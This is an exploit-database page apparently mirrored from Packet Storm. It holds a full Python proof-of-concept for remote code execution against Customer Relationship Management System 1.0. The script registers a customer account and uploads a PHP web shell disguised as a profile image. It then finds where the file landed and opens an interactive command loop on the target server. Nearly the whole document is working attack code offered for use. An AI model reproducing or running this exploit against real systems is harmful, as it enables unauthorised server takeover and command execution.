Exploit for Customer Relationship Management System 1.0 Remote Code Execution

Name: Exploit for Customer Relationship Management System 1.0 Remote Code Execution
Rating: 5 (74 reviews)
2021-06-22 | CVSS 0.1
## https://sploitus.com/exploit?id=PACKETSTORM:163235
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Remote Code Execution  
# Date: 21.06.2021  
# Exploit Author: Ishan Saha  
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip  
# Version: 1.x  
# Tested on: Ubuntu  
  
# REQUREMENTS #   
# run pip3 install requests colorama beautifulsoup4  
  
# DESCRIPTION #  
  
# # Customer relationship management system is vulnerable to malicious file upload on account update option & customer create option  
  
# # Exploit Working:  
# # 1. Starting a session with the server   
# # 2. Registering a user hackerctf : hackerctf and adding payload in image  
# # 3. Finding the uploaded file location in the username image tag   
# # 4. Runing the payload file to give a shell  
  
  
#!/usr/bin/python3  
import requests , time  
from bs4 import BeautifulSoup as bs  
from colorama import Fore, Back, Style  
  
# Variables : change the URL according to need  
URL="http://192.168.0.245/crm/" # CHANGE THIS   
shellcode = "<?php system($_GET['cmd']);?>"  
filename = "shell.php"  
content_data = {"id":"","firstname":"ishan","lastname":"saha","username":"hackerctf","password":"hackerctf"}  
authdata={"username":"hackerctf","password":"hackerctf"}  
def format_text(title,item):  
cr = '\r\n'  
section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr   
item=str(item)  
text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET  
return text  
  
ShellSession = requests.Session()  
response = ShellSession.post(URL+"classes/Users.php?f=create_customer",data=content_data ,files={"img":(filename,shellcode,"application/php")})  
response = ShellSession.post(URL+"classes/Login.php?f=clogin",data=authdata)  
response = ShellSession.get(URL + "customer/")  
soup = bs(response.text,"html.parser")  
location= soup.find('img')['src']  
  
#print statements  
print(format_text("Target",URL),end='')  
print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')  
print(format_text("shell location",location),end='')  
print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))  
  
while True:  
cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)  
if cmd == 'exit':  
break  
print(ShellSession.get(location + "?cmd="+cmd).content.decode())